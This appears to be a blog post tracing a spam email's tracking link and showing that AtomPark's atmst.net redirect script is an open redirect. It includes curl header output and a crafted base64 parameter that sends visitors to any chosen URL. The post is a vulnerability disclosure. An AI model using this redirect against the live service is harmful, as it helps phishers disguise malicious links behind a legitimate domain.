This weekend I received a spam message that wanted to sell me tickets to a comedy show in Louisville, KY. This spam message caught my eye because it made it past Google’s spam filters and I’m planning to go to Derbycon in Louisville next week. I decided to explore the link in the email a bit and see what I could find.
The original link sent in the email was this.
The first thing I noticed was the base64 encoded data in the
"j" parameter. I decoded the data and got the following JSON object.
Looking at the
"l" key in the JSON object, I decided the special.php page was probably a redirect script so I opened the link using
curl -I to get the headers.
HTTP/1.1 302 Moved Temporarily
Date: Mon, 22 Sep 2014 17:37:27 GMT
Server: Apache mod_fcgid/2.3.10-dev
Sure enough, the special.php page gave me a 302 response and sent me to atmst.net/utr.php. I also noticed that the base64 data in the
"j" parameter was passed to this new page but was URL encoded.
I again used
curl -I to get the page at atmst.net assuming it was a redirect script as well.
HTTP/1.1 302 Found
Date: Mon, 22 Sep 2014 17:39:29 GMT
Location: http:// goo.gl/A7XOJH
Expires: Thu, 25 Sep 2014 17:39:29 GMT
Once again, I’ve been redirected, this time to the URL referenced in the
"l" key in the base64 encoded JSON object.
After doing a bit of research on atmst.net I found that it is used by AtomPark Software as part of its Atomic Email Tracker software. I’m not sure what all of the keys in the JSON object represent but based on the information here, hxxp://www.massmailsoftware.com/tracker/integration.htm the
"u" key is most likely the MD5 hash of the email address of the user account.
I decided to play around with the parameters a bit and see if all of the parameters were required for the redirect to be successful.
With the exception of the
"l" key, I replaced all of the values in the JSON object with the letter “a.” For the “l” key I changed the URL to http%3A%2F%2F%20arbitrary.test so that my JSON object now looked like this.
I then base64 encoded the JSON object and once again used
curl -I to see what would happen.
curl -I http://atmst.net/utr64.php?j=eyJ1IjoiYSIsImkiOiJhIi
HTTP/1.1 302 Found
Date: Mon, 22 Sep 2014 17:45:49 GMT
Location: http:// arbitrary.test
Expires: Thu, 25 Sep 2014 17:45:49 GMT
This time I was redirected to the URL I chose but I did not have to provide a valid user id. This shows the atmst.net server is an open redirect. Further testing showed that only the
"l" keys were required in the JSON object and that it was not necessary to URL encode the target URL.
So if we base64 encode the following JSON object and pass it as the
"j" parameter to atmst.net/utr64.php we will be redirected to google.com
Further research found two other domains run by the same company that are also vulnerable to the open redirect.